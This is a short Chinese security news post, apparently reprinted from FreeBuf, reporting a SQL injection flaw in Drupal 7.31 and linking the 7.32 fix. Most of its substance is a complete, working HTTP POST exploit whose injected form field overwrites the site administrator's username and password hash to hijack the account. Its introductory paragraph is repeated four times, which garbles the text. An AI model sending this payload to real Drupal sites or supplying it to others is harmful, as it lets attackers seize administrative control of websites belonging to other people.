Drupal 7.31版本爆严重SQL注入漏洞

安全 漏洞
今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。

今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。

[[121262]]

测试代码:(请勿用于非法用途)

POST /drupal-7.31/?q=node&destination=node HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/drupal-7.31/
Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

本地环境测试效果:

今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。 

今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。

请相关厂商关注,并尽快修复漏洞。

新版下载:

https://www.drupal.org/drupal-7.32

责任编辑:蓝雨泪 来源: FreeBuf
相关推荐

2010-07-13 21:23:32

软件安全安全漏洞

2021-03-31 11:29:12

OpenSSLDoS证书验证漏洞

2011-08-30 16:11:03

2014-11-04 10:23:14

2010-10-21 16:10:08

2009-09-27 13:11:24

2009-05-31 21:16:07

2010-11-09 16:03:27

2014-02-28 17:29:06

2009-05-30 10:04:56

2009-10-25 13:32:09

2009-11-02 13:47:09

2021-09-16 09:05:45

SQL注入漏洞网络攻击

2010-09-14 15:14:49

查看SQL Serve

2010-10-22 15:18:18

SQL注入漏洞

2009-02-12 10:14:16

2011-07-21 09:25:41

2020-10-15 12:24:46

Linux漏洞攻击

2009-09-30 11:10:31

2014-05-15 10:00:31

Dropbox安全漏洞
点赞
收藏

51CTO技术栈公众号